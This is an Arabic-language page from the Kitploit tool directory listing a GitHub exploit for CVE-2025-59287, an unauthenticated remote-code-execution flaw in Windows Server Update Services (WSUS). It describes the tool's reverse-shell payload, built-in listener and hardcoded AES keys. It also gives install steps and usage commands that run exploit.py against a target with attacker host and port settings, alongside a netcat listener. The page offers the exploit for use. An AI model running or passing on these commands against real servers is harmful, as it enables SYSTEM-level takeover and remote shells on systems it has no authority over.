Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-59287 — استغلال آلي لثغرة CVE-2025-59287، وهي ثغرة تنفيذ برمجيات عن بُعد (RCE) غير مصادق عليها في WSUS، تتضمن توليد الحمولة، ومستمع الصدفة العكسية، وتشفير AES بمفاتيح مضمّنة. | Kitploit
أدوات/GitHubGitHub/garvitv14/cve-2025-59287
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubgarvitv14/cve-2025-59287

CVE-2025-59287

استغلال آلي لثغرة CVE-2025-59287، وهي ثغرة تنفيذ برمجيات عن بُعد (RCE) غير مصادق عليها في WSUS، تتضمن توليد الحمولة، ومستمع الصدفة العكسية، وتشفير AES بمفاتيح مضمّنة.

عرض المستودع
16277منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال CVE-2025-59287 لـ WSUS RCE

أداة استغلال آلية لثغرة تنفيذ التعليمات البرمجية عن بُعد غير المصادق عليها في خادم تحديثات ويندوز (WSUS).

تفاصيل الثغرة

  • معرف CVE: CVE-2025-59287
  • درجة CVSS: 9.8 (حرجة)
  • متجه الهجوم: الشبكة
  • المصادقة: غير مطلوبة
  • الأثر: تنفيذ تعليمات برمجية عن بُعد بصلاحيات SYSTEM

الميزات

✅ توليد حمولة مؤتمت بالكامل
✅ تنزيل تلقائي لاعتماد ysoserial.NET
✅ مستمع شل عكسي مدمج
✅ دعم متعدد المنصات (ويندوز/لينكس/ماك)
✅ تشفير AES بمفاتيح WSUS الثابتة
✅ حمولة شل عكسي عبر PowerShell

المتطلبات

pip install -r requirements.txt

تبعيات بايثون

بيئة تشغيل .NET (اكتشاف تلقائي)

  • ويندوز: .NET Framework (مدمج)
  • لينكس/ماك: Wine أو Mono أوبونتو/ديبيان

sudo apt install wine-stable

sudo apt install mono-complete

التثبيت

استنساخ أو تنزيل ملفات الاستغلال

cd CVE-2025-59287-exploit

تشغيل الاستغلال (تنزيل تلقائي لـ ysoserial.NET)

python3 exploit.py -u http://target:8530 -lhost YOUR_IP -lport 4444

الاستخدام

الاستغلال الأساسي

python3 exploit.py -u http://192.168.1.100:8530 -lhost 10.10.14.5 -lport 4444

إذا كنت تريد جلسة على مستمع آخر

الطرفية 1: تشغيل مستمع netcat

nc -lvnp 4444

الطرفية 2: تشغيل الاستغلال بدون المستمع المدمج

python3 exploit.py -u http://target:8530 -lhost 10.10.14.5 -lport 4444 --no-listener

تنزيل الأداة